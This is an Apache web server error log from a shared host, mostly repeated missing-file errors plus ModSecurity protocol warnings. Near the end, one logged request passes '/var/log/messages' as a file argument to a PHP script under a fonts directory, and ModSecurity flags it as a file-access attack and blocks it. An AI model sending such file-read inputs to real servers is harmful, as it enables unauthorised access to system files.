[Mon May 11 19:31:07.220712 2026] [security2:error] [pid 1501831:tid 1501839] [client 49.51.73.183:35940] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agISW1NddpkriGUb6ZVZMAAAAQY"]
[Mon May 11 19:31:11.728045 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:11.856037 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:11.982434 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:12.110688 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:12.259633 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:12.605808 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:12.736232 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:12.862963 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.005187 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.132307 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.258651 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.385460 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.512768 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.641818 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.768446 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:13.895322 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:14.024714 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:14.154447 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:14.283486 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:14.504739 2026] [authz_core:error] [pid 1511173:tid 1511196] [client 216.73.216.110:21765] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/lang/error_log
[Mon May 11 19:31:14.787808 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:14.914902 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.041739 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.175813 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.306969 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.557131 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.684461 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.814071 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:15.940947 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:16.070913 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:16.204646 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:16.332727 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:16.741532 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:16.869506 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:16.996765 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.134315 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.261246 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.399521 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.526190 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.654130 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.798480 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:17.940346 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:18.089706 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:18.229890 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:18.393070 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:18.554831 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:19.221297 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:19.351530 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:19.478460 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:19.614740 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:19.753371 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:19.880137 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.019613 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.146500 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.277427 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.404513 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.535752 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.675280 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.802599 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:20.929372 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.065725 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.208202 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.340867 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.468194 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.595393 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.722578 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.849392 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:21.976441 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:22.304687 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:22.443366 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:22.985772 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:23.119108 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:23.291902 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:23.901796 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:24.028578 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:24.166762 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:24.322295 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:24.451116 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:24.568387 2026] [ssl:error] [pid 1501831:tid 1501852] (EAI 2)Name or service not known: [client 74.7.228.45:57224] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:31:24.569248 2026] [ssl:error] [pid 1501831:tid 1501852] AH01941: stapling_renew_response: responder error
[Mon May 11 19:31:24.577989 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:24.704342 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.085301 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.211743 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.338868 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.468111 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.599118 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.726032 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:25.853349 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:26.239966 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:26.372017 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:26.512983 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:26.533638 2026] [security2:error] [pid 1501831:tid 1501857] [client 43.135.133.194:42488] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/contactez-nous/"] [unique_id "agISblNddpkriGUb6ZVZVwAAARg"]
[Mon May 11 19:31:26.796367 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:26.924747 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.053454 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.300977 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.431847 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.559078 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.697069 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.823942 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:27.951113 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:28.078714 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:28.207727 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:28.425333 2026] [:error] [pid 1511173:tid 1511198] [client 52.242.216.199:50903] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:29.459323 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:29.595734 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:29.729462 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:29.861907 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:29.994006 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.129478 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.272836 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.412475 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.545219 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.689483 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.825855 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:30.967225 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:31.122339 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:31.254952 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:31.386361 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:31.738171 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:31.871462 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:32.002915 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:32.347595 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:32.482263 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:32.632231 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:32.765612 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:32.899488 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:33.031848 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:33.163204 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:33.961138 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:34.092413 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:34.256177 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:35.412741 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:35.558541 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:35.690620 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:35.822712 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:35.954382 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:36.087973 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:36.681497 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:36.820491 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:36.959516 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:37.092294 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:37.223594 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:37.355574 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:37.751070 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:38.227025 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:38.358641 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:38.490142 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:38.621645 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:38.759075 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:38.891505 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:39.024177 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:39.164306 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:39.297541 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:39.437734 2026] [:error] [pid 1501883:tid 1501894] [client 52.242.216.199:32912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 19:31:43.312647 2026] [security2:error] [pid 1501831:tid 1501853] [client 43.156.50.197:37372] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agISf1NddpkriGUb6ZVZZQAAARQ"]
[Mon May 11 19:31:47.559184 2026] [security2:error] [pid 1502013:tid 1502044] [client 43.156.50.197:47784] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agISg5Yn-x0CHsbEbP2OYwAAAJE"], referer: http://www.castiglionecorporatefinance.fr
[Mon May 11 19:32:17.500709 2026] [security2:error] [pid 1502013:tid 1502039] [client 216.73.216.110:34351] ModSecurity: Warning. Matched phrase "var/log/messages" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/messages found within ARGS:filesrc: /var/log/messages-20260426"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agISoZYn-x0CHsbEbP2OiwAAAIw"]
[Mon May 11 19:32:17.501684 2026] [security2:error] [pid 1502013:tid 1502039] [client 216.73.216.110:34351] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agISoZYn-x0CHsbEbP2OiwAAAIw"]
[Mon May 11 19:32:17.603391 2026] [security2:error] [pid 1502013:tid 1502039] [client 216.73.216.110:34351] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agISoZYn-x0CHsbEbP2OiwAAAIw"]
[Mon May 11 19:32:36.115838 2026] [core:error] [pid 1502013:tid 1502058] [client 66.249.75.100:53739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
